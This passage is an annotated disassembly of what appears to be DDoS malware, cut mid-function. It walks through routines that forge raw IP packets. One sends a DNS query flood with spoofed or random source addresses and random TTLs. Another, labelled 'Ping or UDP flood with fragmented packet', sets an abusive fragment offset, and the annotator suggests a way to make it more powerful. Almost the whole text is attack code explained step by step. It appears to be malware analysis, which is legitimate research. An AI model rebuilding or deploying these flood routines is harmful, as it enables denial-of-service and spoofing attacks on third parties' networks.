 8049631:   68 8a 76 06 08          push   $format_ip   %d.%d.%d.%d
 8049636:   8d 85 b8 f9 ff ff       lea    0xfffff9b8(%ebp),%eax    // IP
 804963c:   50                      push   %eax
 804963d:   e8 c6 61 00 00          call   sprintf
 8049642:   83 c4 18                add    $0x18,%esp

 8049645:   83 7d 28 00             cmpl   $0x0,0x28(%ebp)
 8049649:   74 03                   je     0x804964e
 804964b:   ff 4d 28                decl   0x28(%ebp)

 get a RAW socket
 804964e:   68 ff 00 00 00          push   $0xff
 8049653:   6a 03                   push   $0x3 SOCK_RAW
 8049655:   6a 02                   push   $0x2 INET
 8049657:   e8 98 d6 00 00          call   socket
 804965c:   89 85 8c f9 ff ff       mov    %eax,socket(%ebp)
 8049662:   83 c4 0c                add    $0xc,%esp
 8049665:   85 c0                   test   %eax,%eax
 8049667:   0f 8e 6b 03 00 00       jle    0x80499d8    // abort

 804966d:   c7 85 80 f9 ff ff 00    movl   $0x0,cpt(%ebp) // cpt
 8049674:   00 00 00 
 8049677:   c7 85 7c f9 ff ff 00    movl   $0x0,0xfffff97c(%ebp)
 804967e:   00 00 00 

memset(ip_header,0,0x400)
 8049681:   68 00 04 00 00          push   $0x400
 8049686:   6a 00                   push   $0x0
 8049688:   57                      push   %edi
 8049689:   e8 d6 e0 00 00          call   memset

 804968e:   83 c4 0c                add    $0xc,%esp
 8049691:   8d 76 00                lea    0x0(%esi),%esi

if 0x34, set IP src from name at 0x38
 8049694:   31 f6                   xor    %esi,%esi
 8049696:   83 7d 34 00             cmpl   $0x0,0x34(%ebp)
 804969a:   74 60                   je     0x80496fc
 804969c:   83 bd 7c f9 ff ff 00    cmpl   $0x0,0xfffff97c(%ebp)
 80496a3:   7f 57                   jg     0x80496fc
 80496a5:   8b 5d 38                mov    0x38(%ebp),%ebx  // nom
 80496a8:   53                      push   %ebx
 80496a9:   e8 d2 28 00 00          call   get_host_by_name
 80496ae:   89 c2                   mov    %eax,%edx
 80496b0:   83 c4 04                add    $0x4,%esp
 80496b3:   85 d2                   test   %edx,%edx
 80496b5:   75 15                   jne    0x80496cc
 80496b7:   68 58 02 00 00          push   $0x258
 80496bc:   e8 0b c0 00 00          call   seterrno_cx
 80496c1:   be 01 00 00 00          mov    $0x1,%esi
 80496c6:   83 c4 04                add    $0x4,%esp
 80496c9:   eb 31                   jmp    0x80496fc
 80496cb:   90                      nop    
 copy IP dst to buffer fffff9c4
 80496cc:   6a 04                   push   $0x4
 80496ce:   8d 85 b4 f9 ff ff       lea    0xfffff9b4(%ebp),%eax // IP
 80496d4:   50                      push   %eax
 80496d5:   8b 42 10                mov    0x10(%edx),%eax
 80496d8:   8b 00                   mov    (%eax),%eax
 80496da:   50                      push   %eax
 80496db:   e8 a0 cd 00 00          call   bcopy

 set IP src from name
 80496e0:   8b 85 b4 f9 ff ff       mov    0xfffff9b4(%ebp),%eax
 80496e6:   89 47 10                mov    %eax,0x10(%edi)
 
 80496e9:   89 85 dc fd ff ff       mov    %eax,0xfffffddc(%ebp)
 80496ef:   c7 85 7c f9 ff ff 40    movl   $0x9c40,0xfffff97c(%ebp)
 80496f6:   9c 00 00 
 80496f9:   83 c4 0c                add    $0xc,%esp
 if 0x34(%ebp)==0, use given IP instead of name
 80496fc:   85 f6                   test   %esi,%esi
 80496fe:   75 94                   jne    0x8049694
 8049700:   31 f6                   xor    %esi,%esi
 8049702:   89 ad 78 f9 ff ff       mov    %ebp,0xfffff978(%ebp)
 8049708:   83 7d 34 00             cmpl   $0x0,0x34(%ebp)
 804970c:   75 15                   jne    0x8049723
 804970e:   8d 85 b8 f9 ff ff       lea    0xfffff9b8(%ebp),%eax    // IP
 8049714:   50                      push   %eax
 8049715:   e8 72 37 00 00          call   inet_addr
 804971a:   89 85 dc fd ff ff       mov    %eax,0xfffffddc(%ebp)
 8049720:   83 c4 04                add    $0x4,%esp

copy a DNS query
 8049723:   8b 95 78 f9 ff ff       mov    0xfffff978(%ebp),%edx
 8049729:   81 c2 e8 fd ff ff       add    $0xfffffde8,%edx // DNS query list
 804972f:   8b 44 b5 dc             mov    0xffffffdc(%ebp,%esi,4),%eax // size of query
 8049733:   50                      push   %eax
 8049734:   52                      push   %edx
 8049735:   8b 9d 84 f9 ff ff       mov    0xfffff984(%ebp),%ebx
 804973b:   53                      push   %ebx
 804973c:   e8 eb cd 00 00          call   memcopy
 8049741:   83 c4 0c                add    $0xc,%esp


DNS transaction id is random
 8049744:   e8 ef c6 00 00          call   random
 8049749:   bb ff 00 00 00          mov    $0xff,%ebx
 804974e:   99                      cltd   
 804974f:   f7 fb                   idiv   %ebx,%eax
 8049751:   8b 9d 84 f9 ff ff       mov    0xfffff984(%ebp),%ebx
 8049757:   88 13                   mov    %dl,(%ebx)
 8049759:   e8 da c6 00 00          call   random
 804975e:   bb ff 00 00 00          mov    $0xff,%ebx
 8049763:   99                      cltd   
 8049764:   f7 fb                   idiv   %ebx,%eax
 8049766:   8b 9d 84 f9 ff ff       mov    0xfffff984(%ebp),%ebx
 804976c:   88 53 01                mov    %dl,0x1(%ebx)

if not specified, random UDP source port
 804976f:   83 7d 2c 00             cmpl   $0x0,0x2c(%ebp)
 8049773:   75 17                   jne    0x804978c
 8049775:   83 7d 30 00             cmpl   $0x0,0x30(%ebp)
 8049779:   75 11                   jne    0x804978c
 804977b:   e8 b8 c6 00 00          call   random
 8049780:   bb 30 75 00 00          mov    $0x7530,%ebx
 8049785:   99                      cltd   
 8049786:   f7 fb                   idiv   %ebx,%eax
 8049788:   89 d0                   mov    %edx,%eax
 804978a:   eb 0a                   jmp    0x8049796
 804978c:   8b 45 2c                mov    0x2c(%ebp),%eax
 804978f:   c1 e0 08                shl    $0x8,%eax
 8049792:   66 03 45 30             add    0x30(%ebp),%ax
 8049796:   86 c4                   xchg   %al,%ah
 8049798:   8b 9d 88 f9 ff ff       mov    0xfffff988(%ebp),%ebx
 804979e:   66 89 03                mov    %ax,(%ebx)   // src port

UDP dst port=53
 80497a1:   8b 9d 88 f9 ff ff       mov    0xfffff988(%ebp),%ebx
 80497a7:   66 c7 43 02 00 35       movw   $0x3500,0x2(%ebx)

set UDP size=UDP header size (8)+size of DNS query
 80497ad:   66 8b 44 b5 dc          mov    0xffffffdc(%ebp,%esi,4),%ax
 80497b2:   66 83 c0 08             add    $0x8,%ax
 80497b6:   86 c4                   xchg   %al,%ah
 80497b8:   66 89 43 04             mov    %ax,0x4(%ebx)
UDP crc = 0
 80497bc:   66 c7 43 06 00 00       movw   $0x0,0x6(%ebx)

 If given IP is 0.0.0.0, uses a random source IP
 80497c2:   80 bd 9c f9 ff ff 00    cmpb   $0x0,IP_src_0(%ebp)
 80497c9:   75 71                   jne    0x804983c
 80497cb:   80 bd 98 f9 ff ff 00    cmpb   $0x0,IP_src_1(%ebp)
 80497d2:   75 68                   jne    0x804983c
 80497d4:   80 bd 94 f9 ff ff 00    cmpb   $0x0,IP_src_2(%ebp)
 80497db:   75 5f                   jne    0x804983c
 80497dd:   80 bd 90 f9 ff ff 00    cmpb   $0x0,IP_src_3(%ebp)
 80497e4:   75 56                   jne    0x804983c
 set random source IP
 80497e6:   e8 4d c6 00 00          call   random
 80497eb:   88 c2                   mov    %al,%dl
 80497ed:   80 fa ff                cmp    $0xff,%dl
 80497f0:   0f 93 c0                setae  %al
 80497f3:   00 c2                   add    %al,%dl
 80497f5:   88 95 e4 f9 ff ff       mov    %dl,0xfffff9e4(%ebp)
 80497fb:   e8 38 c6 00 00          call   random
 8049800:   88 c2                   mov    %al,%dl
 8049802:   80 fa ff                cmp    $0xff,%dl
 8049805:   0f 93 c0                setae  %al
 8049808:   00 c2                   add    %al,%dl
 804980a:   88 95 e5 f9 ff ff       mov    %dl,0xfffff9e5(%ebp)
 8049810:   e8 23 c6 00 00          call   random
 8049815:   88 c2                   mov    %al,%dl
 8049817:   80 fa ff                cmp    $0xff,%dl
 804981a:   0f 93 c0                setae  %al
 804981d:   00 c2                   add    %al,%dl
 804981f:   88 95 e6 f9 ff ff       mov    %dl,0xfffff9e6(%ebp)
 8049825:   e8 0e c6 00 00          call   random
 804982a:   88 c2                   mov    %al,%dl
 804982c:   80 fa ff                cmp    $0xff,%dl
 804982f:   0f 93 c0                setae  %al
 8049832:   00 c2                   add    %al,%dl
 8049834:   88 95 e7 f9 ff ff       mov    %dl,0xfffff9e7(%ebp)
 804983a:   eb 30                   jmp    0x804986c
 otherwise set source IP
 804983c:   8a 9d 9c f9 ff ff       mov    IP_src_0(%ebp),%bl
 8049842:   88 9d e4 f9 ff ff       mov    %bl,0xfffff9e4(%ebp)
 8049848:   8a 9d 98 f9 ff ff       mov    IP_src_1(%ebp),%bl
 804984e:   88 9d e5 f9 ff ff       mov    %bl,0xfffff9e5(%ebp)
 8049854:   8a 9d 94 f9 ff ff       mov    IP_src_2(%ebp),%bl
 804985a:   88 9d e6 f9 ff ff       mov    %bl,0xfffff9e6(%ebp)
 8049860:   8a 9d 90 f9 ff ff       mov    IP_src_3(%ebp),%bl
 8049866:   88 9d e7 f9 ff ff       mov    %bl,0xfffff9e7(%ebp)
 
 set IP dst from given IP
 804986c:   83 7d 34 00             cmpl   $0x0,0x34(%ebp) // use IP dst ?
 8049870:   75 30                   jne    0x80498a2
 8049872:   8a 9d ac f9 ff ff       mov    IP_dst_0(%ebp),%bl
 8049878:   88 9d e8 f9 ff ff       mov    %bl,0xfffff9e8(%ebp)
 804987e:   8a 9d a8 f9 ff ff       mov    IP_dst_1(%ebp),%bl
 8049884:   88 9d e9 f9 ff ff       mov    %bl,0xfffff9e9(%ebp)
 804988a:   8a 9d a4 f9 ff ff       mov    IP_dst_2(%ebp),%bl
 8049890:   88 9d ea f9 ff ff       mov    %bl,0xfffff9ea(%ebp)
 8049896:   8a 9d a0 f9 ff ff       mov    IP_dst_3(%ebp),%bl
 804989c:   88 9d eb f9 ff ff       mov    %bl,0xfffff9eb(%ebp)

IPv4, ip header=20 bytes
 80498a2:   c6 07 45                movb   $0x45,(%edi)

set TTL between 120 and 255
 80498a5:   e8 8e c5 00 00          call   random
 80498aa:   bb 82 00 00 00          mov    $0x82,%ebx
 80498af:   99                      cltd   
 80498b0:   f7 fb                   idiv   %ebx,%eax
 80498b2:   80 c2 78                add    $0x78,%dl
 80498b5:   88 57 08                mov    %dl,0x8(%edi)

IP id=random
 80498b8:   e8 7b c5 00 00          call   random
 80498bd:   bb ff 00 00 00          mov    $0xff,%ebx
 80498c2:   99                      cltd   
 80498c3:   f7 fb                   idiv   %ebx,%eax
 80498c5:   66 89 57 04             mov    %dx,0x4(%edi)

IP proto=0x11=UDP
 80498c9:   c6 47 09 11             movb   $0x11,0x9(%edi)
IP flag=0
 80498cd:   66 c7 47 06 00 00       movw   $0x0,0x6(%edi)
IP len=dns+ip header(20)+udp header(8)
 80498d3:   66 8b 44 b5 dc          mov    0xffffffdc(%ebp,%esi,4),%ax
 80498d8:   66 83 c0 1c             add    $0x1c,%ax
 80498dc:   86 c4                   xchg   %al,%ah
 80498de:   66 89 47 02             mov    %ax,0x2(%edi)

Calculate IP crc
Initialise stored IP crc to 0
 80498e2:   66 c7 47 0a 00 00       movw   $0x0,0xa(%edi)
 80498e8:   ba 14 00 00 00          mov    $0x14,%edx
 80498ed:   8d 9d d8 f9 ff ff       lea    0xfffff9d8(%ebp),%ebx
 80498f3:   89 9d 74 f9 ff ff       mov    %ebx,0xfffff974(%ebp)
 80498f9:   31 c9                   xor    %ecx,%ecx
 Initialise calculated IP crc to 0
 80498fb:   66 c7 85 b2 f9 ff ff    movw   $0x0,0xfffff9b2(%ebp)
 8049902:   00 00 

 8049904:   8b 9d 74 f9 ff ff       mov    0xfffff974(%ebp),%ebx
 804990a:   0f b7 03                movzwl (%ebx),%eax
 804990d:   01 c1                   add    %eax,%ecx
 804990f:   83 c3 02                add    $0x2,%ebx
 8049912:   89 9d 74 f9 ff ff       mov    %ebx,0xfffff974(%ebp)
 8049918:   83 c2 fe                add    $0xfffffffe,%edx
 804991b:   83 fa 01                cmp    $0x1,%edx
 804991e:   7f e4                   jg     0x8049904
 8049920:   75 11                   jne    0x8049933
 8049922:   8a 03                   mov    (%ebx),%al
 8049924:   88 85 b2 f9 ff ff       mov    %al,0xfffff9b2(%ebp)
 804992a:   0f b7 85 b2 f9 ff ff    movzwl 0xfffff9b2(%ebp),%eax
 8049931:   01 c1                   add    %eax,%ecx
 8049933:   89 ca                   mov    %ecx,%edx
 8049935:   c1 fa 10                sar    $0x10,%edx
 8049938:   0f b7 c1                movzwl %cx,%eax
 804993b:   8d 0c 10                lea    (%eax,%edx,1),%ecx
 804993e:   89 c8                   mov    %ecx,%eax
 8049940:   c1 f8 10                sar    $0x10,%eax
 8049943:   01 c1                   add    %eax,%ecx
 8049945:   89 c8                   mov    %ecx,%eax
 8049947:   66 f7 d0                not    %ax
Save the crc
 804994a:   66 89 85 b2 f9 ff ff    mov    %ax,0xfffff9b2(%ebp)
 8049951:   66 89 47 0a             mov    %ax,0xa(%edi)


Send the DNS request
 8049955:   6a 10                   push   $0x10    // len
 8049957:   8d 85 d8 fd ff ff       lea    0xfffffdd8(%ebp),%eax    // to
 804995d:   50                      push   %eax
 804995e:   6a 00                   push   $0x0 // flag
 8049960:   8b 44 b5 dc             mov    0xffffffdc(%ebp,%esi,4),%eax
 8049964:   83 c0 1c                add    $0x1c,%eax
 8049967:   50                      push   %eax
 8049968:   8d 85 d8 f9 ff ff       lea    0xfffff9d8(%ebp),%eax    // IP
 804996e:   50                      push   %eax
 804996f:   8b 9d 8c f9 ff ff       mov    socket(%ebp),%ebx
 8049975:   53                      push   %ebx
 8049976:   e8 c1 d2 00 00          call   sendto
 804997b:   83 c4 18                add    $0x18,%esp

 804997e:   83 7d 28 00             cmpl   $0x0,0x28(%ebp)
 8049982:   75 0c                   jne    0x8049990
 8049984:   68 2c 01 00 00          push   $0x12c
 8049989:   e8 22 bc 00 00          call   feof
 804998e:   eb 1f                   jmp    0x80499af
 8049990:   8b 5d 28                mov    0x28(%ebp),%ebx
 8049993:   39 9d 80 f9 ff ff       cmp    %ebx,cpt(%ebp)
 8049999:   75 21                   jne    0x80499bc
 804999b:   68 2c 01 00 00          push   $0x12c
 80499a0:   e8 0b bc 00 00          call   feof
 80499a5:   c7 85 80 f9 ff ff 00    movl   $0x0,cpt(%ebp)
 80499ac:   00 00 00 
 80499af:   ff 8d 7c f9 ff ff       decl   0xfffff97c(%ebp)
 80499b5:   83 c4 04                add    $0x4,%esp
 80499b8:   eb 08                   jmp    0x80499c2
 80499ba:   8d 36                   lea    (%esi),%esi
 80499bc:   ff 85 80 f9 ff ff       incl   cpt(%ebp)
No more IP, restart with next DNS request
 80499c2:   83 85 78 f9 ff ff 32    addl   $0x32,0xfffff978(%ebp)
 80499c9:   46                      inc    %esi
 80499ca:   83 fe 08                cmp    $0x8,%esi
 80499cd:   0f 8e 35 fd ff ff       jle    0x8049708
end of while(1)
 80499d3:   e9 bc fc ff ff          jmp    0x8049694

pid=0; return 0;
 80499d8:   c7 05 74 e7 07 08 00    movl   $0x0,pid
 80499df:   00 00 00 
 80499e2:   31 c0                   xor    %eax,%eax
 80499e4:   8d a5 68 f9 ff ff       lea    0xfffff968(%ebp),%esp
 80499ea:   5b                      pop    %ebx
 80499eb:   5e                      pop    %esi
 80499ec:   5f                      pop    %edi
 80499ed:   89 ec                   mov    %ebp,%esp
 80499ef:   5d                      pop    %ebp
 80499f0:   c3                      ret    
 80499f1:   8d 76 00                lea    0x0(%esi),%esi

Function 5, Ping or UDP flood with fragmented packet

It may be more powerfull to use a random fragmentation offset instead of a hard coded offset. It's a bit strange to fill the UDP or ICMP structure...

/*
0x8 =0  ICMP
    !=0 UDP
0xc port UDP dst
0x10 0x14 0x18 0x1C IP dst
0x20 0x24 0x28 0x2C IP src
0x30 use name ?
0x34 name dst
*/
 80499f4:   55                      push   %ebp
 80499f5:   89 e5                   mov    %esp,%ebp
 80499f7:   81 ec a0 00 00 00       sub    $0xa0,%esp
 80499fd:   57                      push   %edi
 80499fe:   56                      push   %esi
 80499ff:   53                      push   %ebx
 Copy IP dst argument
 8049a00:   8a 4d 10                mov    0x10(%ebp),%cl
 8049a03:   88 4d 84                mov    %cl,0xffffff84(%ebp)
 8049a06:   8a 4d 14                mov    0x14(%ebp),%cl
 8049a09:   88 4d 80                mov    %cl,0xffffff80(%ebp)
 8049a0c:   8a 4d 18                mov    0x18(%ebp),%cl
 8049a0f:   88 8d 7c ff ff ff       mov    %cl,0xffffff7c(%ebp)
 8049a15:   8a 4d 1c                mov    0x1c(%ebp),%cl
 8049a18:   88 8d 78 ff ff ff       mov    %cl,0xffffff78(%ebp)

 Copy IP src argument
 8049a1e:   8a 4d 20                mov    0x20(%ebp),%cl
 8049a21:   88 8d 74 ff ff ff       mov    %cl,0xffffff74(%ebp)
 8049a27:   8a 4d 24                mov    0x24(%ebp),%cl
 8049a2a:   88 8d 70 ff ff ff       mov    %cl,0xffffff70(%ebp)
 8049a30:   8a 4d 28                mov    0x28(%ebp),%cl
 8049a33:   88 8d 6c ff ff ff       mov    %cl,0xffffff6c(%ebp)
 8049a39:   8a 5d 2c                mov    0x2c(%ebp),%bl
 
 init data
 8049a3c:   66 c7 45 f0 02 00       movw   $0x2,0xfffffff0(%ebp) // AF_INET

 random IP dst
 8049a42:   e8 f1 c3 00 00          call   random
 8049a47:   b9 ff 00 00 00          mov    $0xff,%ecx
 8049a4c:   99                      cltd   
 8049a4d:   f7 f9                   idiv   %ecx,%eax
 8049a4f:   89 d0                   mov    %edx,%eax
 8049a51:   86 c4                   xchg   %al,%ah
 8049a53:   66 89 45 f2             mov    %ax,0xfffffff2(%ebp)

 IP src
 8049a57:   0f b6 c3                movzbl %bl,%eax
 8049a5a:   50                      push   %eax
 8049a5b:   0f b6 85 6c ff ff ff    movzbl 0xffffff6c(%ebp),%eax
 8049a62:   50                      push   %eax
 8049a63:   0f b6 85 70 ff ff ff    movzbl 0xffffff70(%ebp),%eax
 8049a6a:   50                      push   %eax
 8049a6b:   0f b6 85 74 ff ff ff    movzbl 0xffffff74(%ebp),%eax
 8049a72:   50                      push   %eax
 8049a73:   68 8a 76 06 08          push   $format_ip
 8049a78:   8d 75 90                lea    0xffffff90(%ebp),%esi
 8049a7b:   56                      push   %esi
 8049a7c:   e8 87 5d 00 00          call   sprintf
 8049a81:   83 c4 18                add    $0x18,%esp

 use name ?
 8049a84:   83 7d 30 00             cmpl   $0x0,0x30(%ebp)
 8049a88:   75 34                   jne    0x8049abe
 set destination IP
 8049a8a:   0f b6 85 78 ff ff ff    movzbl 0xffffff78(%ebp),%eax
 8049a91:   50                      push   %eax
 8049a92:   0f b6 85 7c ff ff ff    movzbl 0xffffff7c(%ebp),%eax
 8049a99:   50                      push   %eax
 8049a9a:   0f b6 45 80             movzbl 0xffffff80(%ebp),%eax
 8049a9e:   50                      push   %eax
 8049a9f:   0f b6 45 84             movzbl 0xffffff84(%ebp),%eax
 8049aa3:   50                      push   %eax
 8049aa4:   68 8a 76 06 08          push   $format_ip
 8049aa9:   8d 5d b0                lea    0xffffffb0(%ebp),%ebx
 8049aac:   53                      push   %ebx
 8049aad:   e8 56 5d 00 00          call   sprintf

 8049ab2:   53                      push   %ebx
 8049ab3:   e8 d4 33 00 00          call   inet_addr
 8049ab8:   89 45 f4                mov    %eax,0xfffffff4(%ebp)
 8049abb:   83 c4 1c                add    $0x1c,%esp

 get a RAW socket
 8049abe:   68 ff 00 00 00          push   $0xff
 8049ac3:   6a 03                   push   $0x3 SOCK_RAW
 8049ac5:   6a 02                   push   $0x2 INET
 8049ac7:   e8 28 d2 00 00          call   socket
 8049acc:   89 85 68 ff ff ff       mov    %eax,socket(%ebp)
 8049ad2:   83 c4 0c                add    $0xc,%esp
 8049ad5:   85 c0                   test   %eax,%eax
 8049ad7:   0f 8e 47 02 00 00       jle    0x8049d24

IPv4, ip header=20 bytes
 8049add:   c6 45 d0 45             movb   $0x45,0xffffffd0(%ebp)   // IP
set IP length
 8049ae1:   66 c7 45 d2 28 1c       movw   $0x1c28,0xffffffd2(%ebp)
set IP id
 8049ae7:   66 c7 45 d4 04 55       movw   $0x5504,0xffffffd4(%ebp)
set TTL between 120 and 255
 8049aed:   e8 46 c3 00 00          call   random
 8049af2:   b9 82 00 00 00          mov    $0x82,%ecx
 8049af7:   99                      cltd   
 8049af8:   f7 f9                   idiv   %ecx,%eax
 8049afa:   80 c2 78                add    $0x78,%dl
 8049afd:   88 55 d8                mov    %dl,0xffffffd8(%ebp)
set IP src
 8049b00:   56                      push   %esi
 8049b01:   e8 86 33 00 00          call   inet_addr
 8049b06:   89 45 dc                mov    %eax,0xffffffdc(%ebp)
 8049b09:   83 c4 04                add    $0x4,%esp
set IP dst
 8049b0c:   83 7d 30 00             cmpl   $0x0,0x30(%ebp)
 8049b10:   75 0f                   jne    0x8049b21
 8049b12:   8d 45 b0                lea    0xffffffb0(%ebp),%eax
 8049b15:   50                      push   %eax
 8049b16:   e8 71 33 00 00          call   inet_addr
 8049b1b:   89 45 e0                mov    %eax,0xffffffe0(%ebp)
 8049b1e:   83 c4 04                add    $0x4,%esp

IP offset=65520
 8049b21:   66 c7 45 d6 1f fe       movw   $0xfe1f,0xffffffd6(%ebp)
IP crc=0
 8049b27:   66 c7 45 da 00 00       movw   $0x0,0xffffffda(%ebp)
 8049b2d:   83 7d 08 00             cmpl   $0x0,0x8(%ebp)
 8049b31:   74 7d                   je     0x8049bb0 // autre posibilite

IP proto=0x11=UDP
 8049b33:   c6 45 d9 11             movb   $0x11,0xffffffd9(%ebp)
random UDP source port
 8049b37:   e8 fc c2 00 00          call   random
 8049b3c:   b9 ff 00 00 00          mov    $0xff,%ecx
 8049b41:   99                      cltd   
 8049b42:   f7 f9                   idiv   %ecx,%eax
 8049b44:   89 d0                   mov    %edx,%eax
 8049b46:   86 c4                   xchg   %al,%ah
 8049b48:   66 89 45 e4             mov    %ax,0xffffffe4(%ebp)
set UDP destination port
 8049b4c:   66 8b 45 0c             mov    0xc(%ebp),%ax
 8049b50:   86 c4                   xchg   %al,%ah
 8049b52:   66 89 45 e6             mov    %ax,0xffffffe6(%ebp)
set UDP data length
 8049b56:   66 c7 45 e8 00 09       movw   $0x900,0xffffffe8(%ebp)

Calculate IP crc
 8049b5c:   ba 09 00 00 00          mov    $0x9,%edx
 8049b61:   8d 75 e4                lea    0xffffffe4(%ebp),%esi
 8049b64:   31 db                   xor    %ebx,%ebx
 8049b66:   66 c7 45 8e 00 00       movw   $0x0,0xffffff8e(%ebp)
 8049b6c:   0f b7 06                movzwl (%esi),%eax
 8049b6f:   01 c3                   add    %eax,%ebx
 8049b71:   83 c6 02                add    $0x2,%esi
 8049b74:   83 c2 fe                add    $0xfffffffe,%edx
 8049b77:   83 fa 01                cmp    $0x1,%edx
 8049b7a:   7f f0                   jg     0x8049b6c
 8049b7c:   75 0b                   jne    0x8049b89
 8049b7e:   8a 06                   mov    (%esi),%al
 8049b80:   88 45 8e                mov    %al,0xffffff8e(%ebp)
 8049b83:   0f b7 45 8e             movzwl 0xffffff8e(%ebp),%eax
 8049b87:   01 c3                   add    %eax,%ebx
 8049b89:   89 da                   mov    %ebx,%edx
 8049b8b:   c1 fa 10                sar    $0x10,%edx
 8049b8e:   0f b7 c3                movzwl %bx,%eax
 8049b91:   8d 1c 10                lea    (%eax,%edx,1),%ebx
 8049b94:   89 d8                   mov    %ebx,%eax
 8049b96:   c1 f8 10                sar    $0x10,%eax
 8049b99:   01 c3                   add    %eax,%ebx
 8049b9b:   89 d8                   mov    %ebx,%eax
 8049b9d:   66 f7 d0                not    %ax
Save the crc
 8049ba0:   66 89 45 8e             mov    %ax,0xffffff8e(%ebp)
 8049ba4:   66 89 45 ea             mov    %ax,0xffffffea(%ebp)
Put data
 8049ba8:   c6 45 ec 61             movb   $0x61,0xffffffec(%ebp)
end of while(1)
 8049bac:   eb 62                   jmp    0x8049c10
 8049bae:   8d 36                   lea    (%esi),%esi
autre_possibilite:
IP proto=0x1=ICMP
 8049bb0:   c6 45 d9 01             movb   $0x1,0xffffffd9(%ebp)
 type=ping, code=0, crc=0 (it will be true if offset was 0)
 8049bb4:   c6 45 e4 08             movb   $0x8,0xffffffe4(%ebp)
 8049bb8:   c6 45 e5 00             movb   $0x0,0xffffffe5(%ebp)
 8049bbc:   66 c7 45 e6 00 00       movw   $0x0,0xffffffe6(%ebp)
Calculate ICMP crc
 8049bc2:   ba 09 00 00 00          mov    $0x9,%edx
 8049bc7:   8d 75 e4                lea    0xffffffe4(%ebp),%esi
 8049bca:   31 db                   xor    %ebx,%ebx
 8049bcc:   66 c7 45 8e 00 00       movw   $0x0,0xffffff8e(%ebp)
 8049bd2:   8d 36                   lea    (%esi),%esi
 8049bd4:   0f b7 06                movzwl (%esi),%eax
 8049bd7:   01 c3                   add    %eax,%ebx
 8049bd9:   83 c6 02                add    $0x2,%esi
 8049bdc:   83 c2 fe                add    $0xfffffffe,%edx
 8049bdf:   83 fa 01                cmp    $0x1,%edx
 8049be2:   7f f0                   jg     0x8049bd4
 8049be4:   75 0b                   jne    0x8049bf1
 8049be6:   8a 06                   mov    (%esi),%al
 8049be8:   88 45 8e                mov    %al,0xffffff8e(%ebp)
 8049beb:   0f b7 45 8e             movzwl 0xffffff8e(%ebp),%eax
 8049bef:   01 c3                   add    %eax,%ebx
 8049bf1:   89 da                   mov    %ebx,%edx
 8049bf3:   c1 fa 10                sar    $0x10,%edx
 8049bf6:   0f b7 c3                movzwl %bx,%eax
 8049bf9:   8d 1c 10                lea    (%eax,%edx,1),%ebx
 8049bfc:   89 d8                   mov    %ebx,%eax
 8049bfe:   c1 f8 10                sar    $0x10,%eax
 8049c01:   01 c3                   add    %eax,%ebx
 8049c03:   89 d8                   mov    %ebx,%eax
 8049c05:   66 f7 d0                not    %ax
Save the crc
 8049c08:   66 89 45 8e             mov    %ax,0xffffff8e(%ebp)
 8049c0c:   66 89 45 e6             mov    %ax,0xffffffe6(%ebp)

 8049c10:   c7 85 64 ff ff ff 1d    movl   $0x1d,0xffffff64(%ebp)
 8049c17:   00 00 00 
Calculate IP crc
 8049c1a:   ba 14 00 00 00          mov    $0x14,%edx
 8049c1f:   8d 75 d0                lea    0xffffffd0(%ebp),%esi    // IP
 8049c22:   31 db                   xor    %ebx,%ebx
 8049c24:   66 c7 45 8e 00 00       movw   $0x0,0xffffff8e(%ebp)
 8049c2a:   8d 36                   lea    (%esi),%esi
 8049c2c:   0f b7 06                movzwl (%esi),%eax
 8049c2f:   01 c3                   add    %eax,%ebx
 8049c31:   83 c6 02                add    $0x2,%esi
 8049c34:   83 c2 fe                add    $0xfffffffe,%edx
 8049c37:   83 fa 01                cmp    $0x1,%edx
 8049c3a:   7f f0                   jg     0x8049c2c
 8049c3c:   75 0b                   jne    0x8049c49
 8049c3e:   8a 06                   mov    (%esi),%al
 8049c40:   88 45 8e                mov    %al,0xffffff8e(%ebp)
 8049c43:   0f b7 45 8e             movzwl 0xffffff8e(%ebp),%eax
 8049c47:   01 c3                   add    %eax,%ebx
 8049c49:   89 da                   mov    %ebx,%edx
 8049c4b:   c1 fa 10                sar    $0x10,%edx
 8049c4e:   0f b7 c3                movzwl %bx,%eax
 8049c51:   8d 1c 10                lea    (%eax,%edx,1),%ebx
 8049c54:   89 d8                   mov    %ebx,%eax
 8049c56:   c1 f8 10                sar    $0x10,%eax
 8049c59:   01 c3                   add    %eax,%ebx
 8049c5b:   89 d8                   mov    %ebx,%eax
 8049c5d:   66 f7 d0                not    %ax
Save the crc
 8049c60:   66 89 45 8e             mov    %ax,0xffffff8e(%ebp)
 8049c64:   66 89 45 da             mov    %ax,0xffffffda(%ebp)

 8049c68:   31 db                   xor    %ebx,%ebx
 8049c6a:   8d 4d f0                lea    0xfffffff0(%ebp),%ecx
 8049c6d:   89 8d 60 ff ff ff       mov    %ecx,0xffffff60(%ebp)
 8049c73:   8d 7d d0                lea    0xffffffd0(%ebp),%edi //IP
 8049c76:   8d 36                   lea    (%esi),%esi

 8049c78:   31 f6                   xor    %esi,%esi
 use name ?
 8049c7a:   83 7d 30 00             cmpl   $0x0,0x30(%ebp)
 8049c7e:   74 4e                   je     0x8049cce
 8049c80:   85 db                   test   %ebx,%ebx
 8049c82:   7f 4a                   jg     0x8049cce
 8049c84:   8b 4d 34                mov    0x34(%ebp),%ecx
 8049c87:   51                      push   %ecx
 8049c88:   e8 f3 22 00 00          call   get_host_by_name
 8049c8d:   89 c2                   mov    %eax,%edx
 8049c8f:   83 c4 04                add    $0x4,%esp
 8049c92:   85 d2                   test   %edx,%edx
 8049c94:   75 16                   jne    0x8049cac
 8049c96:   68 58 02 00 00          push   $0x258
 8049c9b:   e8 2c ba 00 00          call   seterrno_cx
 8049ca0:   be 01 00 00 00          mov    $0x1,%esi
 8049ca5:   83 c4 04                add    $0x4,%esp
 8049ca8:   eb 24                   jmp    0x8049cce
 8049caa:   8d 36                   lea    (%esi),%esi
 8049cac:   6a 04                   push   $0x4
 8049cae:   8d 45 88                lea    0xffffff88(%ebp),%eax
 8049cb1:   50                      push   %eax
 8049cb2:   8b 42 10                mov    0x10(%edx),%eax
 8049cb5:   8b 00                   mov    (%eax),%eax
 8049cb7:   50                      push   %eax
 8049cb8:   e8 c3 c7 00 00          call   bcopy
 8049cbd:   8b 45 88                mov    0xffffff88(%ebp),%eax
 8049cc0:   89 45 e0                mov    %eax,0xffffffe0(%ebp)
 8049cc3:   89 45 f4                mov    %eax,0xfffffff4(%ebp)
 8049cc6:   bb 40 9c 00 00          mov    $0x9c40,%ebx
 8049ccb:   83 c4 0c                add    $0xc,%esp

 8049cce:   85 f6                   test   %esi,%esi
